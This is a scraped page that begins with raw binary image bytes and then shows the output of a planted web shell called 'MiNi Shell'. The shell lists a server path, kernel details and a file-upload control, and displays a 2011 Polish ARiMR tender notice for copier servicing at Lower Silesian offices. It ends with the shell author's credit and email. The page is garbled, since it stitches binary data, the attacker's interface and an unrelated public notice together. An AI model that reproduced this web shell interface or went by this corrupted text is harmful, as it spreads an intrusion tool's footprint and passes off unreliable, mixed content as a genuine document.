JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110301/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110301/32952-N-2011.html

<p class="kh_header"><b>Wrocław: na świadczenie usług serwisu i konserwacji kopiarek Konica Minolta BIZHUB 250 i 350 w Dolnośląskim oddziale Regionalnym ARiMR oraz 26 Biurach Powiatowych</b><br>
<b>Numer ogłoszenia: 32952 - 2011; data zamieszczenia: 01.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Dolnośląski Oddział Regionalny , ul. Giełdowa 8, 52-438 Wrocław, woj. dolnośląskie, tel. 071 3697400, faks 071 3643702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> na świadczenie usług serwisu i konserwacji kopiarek Konica Minolta BIZHUB 250 i 350 w Dolnośląskim oddziale Regionalnym ARiMR oraz 26 Biurach Powiatowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest serwis i konserwacja kopiarek Konica Minolta: BIZHUB 250 - 29 szt. i BIZHUB 350 - 2 szt., BIZHUB C 250 - 1 szt., BIZHUB C252 - 1 szt.
	Do zadań wykonawcy należeć będzie:
1.	Przeglądy konserwacyjne urządzeń wg wskazań producenta.
2.	Wymiana elementów podlegających wymianie w wyniku normalnej eksploatacji urządzeń wg wskazań producenta sprzętu lub komunikatów z urządzeń.
3.	Usuwanie awarii urządzeń (wszystkich awarii nie zaistniałych z winy użytkownika, np. awaria płyty głównej lub innego elementu elektronicznego).
4.	Aktualizacja oprogramowania kopiarek do aktualnych wersji (minimum raz w roku).
5.	Dostarczanie tonerów dla ww. kopiarek.
6.	Udzielanie wsparcia technicznego dla użytkowników przy obsłudze urządzeń (help desk).
7.	Zmiany konfiguracji urządzeń w trybie serwisowym na żądanie Zamawiającego.
8.	W przypadku braku możliwości usunięcia awarii urządzeń na miejscu dostarczenie urządzenia zastępczego na czas naprawy o parametrach nie niższych niż sprzęt użytkowany przez Zamawiającego.
9.	Diagnozowanie i wycena uszkodzeń innych niż określone w pkt. 3 (uszkodzenia z winy użytkownika).
10.	Wykonywanie comiesięcznego zestawienia wykonanych przez poszczególne urządzenia kopii w poszczególnych lokalizacjach w sposób niewymagający angażowania personelu Zamawiającego, np. przez zastosowanie modemu GSM/GPRS (CS Remote Care) lub OPS (Optimized Print Services). Rozliczenie kopii będzie stanowić załącznik do faktury wystawianej przez Wykonawcę co miesiąc.
11.	Oznaczenie, w widoczny i czytelny sposób, urządzeń Zamawiającego w formie naklejki z informacjami dot. sposobu zgłaszania awarii, usterek i/lub zapotrzebowania na materiały eksploatacyjne. Sposób zgłaszania awarii, usterek i/lub zapotrzebowania na materiały eksploatacyjne rozumiany jest jako: telefon i/lub faks i/lub e-mail.
12.	Po każdorazowej usłudze serwisowej Wykonawca wystawi Zamawiającemu protokół wykonania usługi - wzór protokołu wykonawca przedstawi Zamawiającemu z chwilą podpisania umowy i stanowić będzie jego integralną część.

2. Wykonawca, z którym zostanie podpisana umowa otrzyma aktualny wykaz urządzeń z ilością  wykonanych kopii .
3. Zamawiający wymaga zastosowania przez Wykonawcę oryginalnych części i materiałów eksploatacyjnych.
4. Zamawiający wymaga by Wykonawca dysponował minimum 2 pracownikami, którzy posiadają certyfikaty do wykonywania serwisu i konserwacji urządzeń będących przedmiotem zamówienia.
5. Zamawiający wymaga od Wykonawcy wykazania się dokumentem będącym potwierdzeniem, iż jest autoryzowanym serwisem dla urządzeń Konika Minolta BIZHUB 250 i 350.
6. Zamawiający wymaga by w ciągu 24 godzin od zgłoszenia awarii/usterki urządzenia Wykonawca zajął się naprawą. W przypadku gdy czas naprawy urządzenia jest dłuższy niż 3 dni robocze Wykonawca zobowiązany jest do dostarczenia urządzenia zstępczego o parametrach nie gorszych niż urządzenia Zamawiającego.

Poniżej wykaz lokalizacji w których znajdują się kopiarki.

Lp.	Biuro Powiatowe	Adres
1	Bolesławiec	59-700 Bolesławiec, ul. Komuny Paryskiej 38
2	Dzierżoniów	58-200 Dzierżoniów, Batalionów Chłopskich 19
3	Głogów	67-200 Głogów, ul. Sikorskiego 40
4	Góra	56 - 200 Góra, ul. Armii Polskiej 8
5	Jawor	59-400 Jawor, ul. Starojaworska 91
6	Jelenia Góra	58 - 500 Jelenia Góra, ul. Marcinka 33 a
7	Kamienna Góra	58 - 400 Kamienna Góra, ul. H. Sienkiewicza 6 a
8	Kłodzko	57-300 Kłodzko, ul. Harcerzy 6
9	Legnica	59-220 Legnica, ul. Bydgoska 18
10	Lubań	59-800 Lubań, ul. Karola Miarki 1
11	Lubin	59-300 Lubin ul. Komisji Edukacji Narodowej 6
12	Lwówek z siedzibą w Uboczu	59-620 Gryfów Śl., Ubocze 300
13	Milicz z siedzibą w Sławoszowicach	56-300 Sławoszowice, ul. Kolejowa 28, bud. B
14	Oleśnica z siedzibą w Sycowie	56-500 Syców, ul. Ogrodowa 10
15	Oława	55-200 Oława ul. Nowodojazdowa 9
16	Polkowice	59-100 Polkowice, ul. Spółdzielcza 2
17	Strzelin	57-100 Strzelin, ul. Kamienna 10
18	Środa Śląska	55- 300 Środa Śląska, ul. Wawrzyńca Korwina 2
19	Świdnica	58-100 Świdnica, ul. Saperów 25 b
20	Trzebnica	55-100 Trzebnica, ul. Milicka 23
21	Wałbrzych	58-306 Wałbrzych, ul. Uczniowska 21
22	Wołów	56-100 Wołów ul. Zaułek Zielony 20
23	Wrocław	50 - 452 Wrocław, ul. Komuny Paryskiej 72
24	Ząbkowice Śl.	57-200 Ząbkowice Śl., ul. Staszica 18
25	Zgorzelec	59-900 Zgorzelec ul. Bohaterów II Armii WP 8
26	Złotoryja z siedzibą w Pielgrzymce	59-524, Pielgrzymka 109a/1
27	Oddział Regionalny	52-438 Wrocław, ul. Giełdowa 8

	Dla celów poglądowych Zamawiający podaje ilość wykonanych przez poszczególne urządzenia 
kopii w okresie 12 miesięcy. 

Biuro	Nr Seryjny	Model	ilość kopii wykonanych w ciągu 12 miesięcy*
BP001 Bolesławiec	21 447 724	BizHub250	55 933
BP002 Dzierżoniów	21 437 107	BizHub250	40 940
BP003 Głogów	21 447 969	BizHub250	26 447
BP004 Góra	21 447 940	BizHub250	72 589
BP005 Jawor	21 447 927	BizHub250	24 700
BP006 Jelenia Góra	21 446 859	BizHub250	109 493
BP007 Kamienna Góra	21 437 097	BizHub250	64 585
BP008 Kłodzko	21 447 776	BizHub250	60 158
BP008 Kłodzko	71 021 293	BizHub250	85 690
BP009 Legnica	21 447 936	BizHub250	52 947
BP010 Lubań	21 447 738	BizHub250	41 933
BP011 Lubin	21 447 967	BizHub250	30 939
BP012 Lwówek Śl.	21 447 634	BizHub250	82 704
BP013 Milicz	21 448 084	BizHub250	58 605
BP014 Olesnica	21 447 993	BizHub250	71 023
BP015 Oława	21 447 998	BizHub250	54 329
BP016 Polkowice	21 448 008	BizHub250	50 645
BP017 Strzelin	21 447 555	BizHub250	72 931
BP018 Środa Śl.	21 447 557	BizHub250	8 092
BP019 Świdnica	21 438 331	BizHub250	42 623
BP020 Trzebnica	21 447 574	BizHub250	21 420
BP020 Trzebnica	21 102 345	BizHub250	18 889
BP021 Wałbrzych	21 438 380	BizHub250	47 727
BP022 Wołów	21 447 728	BizHub250	57 110
BP023 Wrocław	30AF90018	BizHub350	43 431
BP023 Wrocław	71 021 919	BizHub250	48 236
BP024 Ząbkowice Śl.	21 437 093	BizHub250	48 804
BP025 Zgorzelec	21 446 820	BizHub250	44 358
BP026 Złotoryja	21 440 179	BizHub250	62 938
OR01 Wrocław	21 405 946	BizHub350	100 374
OR01 Wrocław	21 425 352	BizHub250	46 485
OR01 Wrocław	211 708 981	BizHubC250 cz-b	14 632
OR01 Wrocław	216 717 498	BizHubC252 cz-b	125 114
OR01 Wrocław	211 708 981	BizHubC250 kolor	1 168
OR01 Wrocław	216 717 498	BizHubC252 kolor	12 138
Suma	 	 	1 661 710
			
* ilość kopii dla poszczególnych urządzeń nie jest wartością stałą	
jest to przykładowa ilość kopii jaki urządzenia wykonały w 2010	
w 2011 roku ilość kopii może ulec zmianie		
			

Rozliczenia z Wykonawcą odbywać się będą w cyklach miesięcznych. Wykonawca wystawiać będzie jedną zbiorczą fakturę z podziałem za poszczególne rodzaje kopii a załącznikiem do faktury będzie szczegółowa specyfikacja z wykazem urządzeń w poszczególnych jednostkach Zamawiającego z ilością kopii wykonaną przez urządzenia będące przedmiotem umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.31.32.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.03.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie wykonawcy że wykonawca jest autoryzowanym serwisem urządzeń wymienionych w SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenie posiadanych uprawnień przez pracowników wydane przez producenta sprzętu Konica Minolta. Minimum 2 pracowników.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany zawartej umowy w następujących przypadkach:
1.	działania siły wyższej lub wystąpienia stanu wyższej konieczności,
2.	zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe,
3.	zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia,
4.	omyłek pisarskich lub błędów rachunkowych,
5.	mających na celu wyjaśnienie wątpliwości dotyczących treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
6.	jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego,
7.	innych zmian korzystnych dla Zamawiającego, w tym polegających na zmianie elementów zamówienia na elementy lepsze lub odpowiedniejsze, chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dolnośląski Oddział Regionalny ARiMR, 52-438 Wrocław, ul. Giełdowa 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2011 godzina 10:00, miejsce: Dolnośląski Oddział Regionalny ARiMR, 52-438 Wrocław, ul. Giełdowa 8, sekretariat, I pietro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com